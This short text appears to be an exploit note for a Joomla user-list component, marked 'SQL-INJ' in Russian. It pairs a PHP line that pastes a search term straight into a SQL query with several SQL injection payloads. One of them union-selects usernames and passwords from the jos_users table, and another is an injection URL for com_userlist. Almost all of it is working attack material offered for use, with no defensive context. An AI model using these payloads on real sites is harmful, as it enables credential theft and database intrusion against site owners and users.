if ($search != "") { $query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";
1' and 1=2) and 1=2 union select 1,2,3,4,5,6-- 1
1' and 1=2) and 1=2 union select concat(username,char(58),password),2,3,4,5,6 from jos_users-- 1
Версия 2.0 SQL-INJ /index.php?option=com_userlist&limitstart=0,0+union+select+1,2,3,4--+1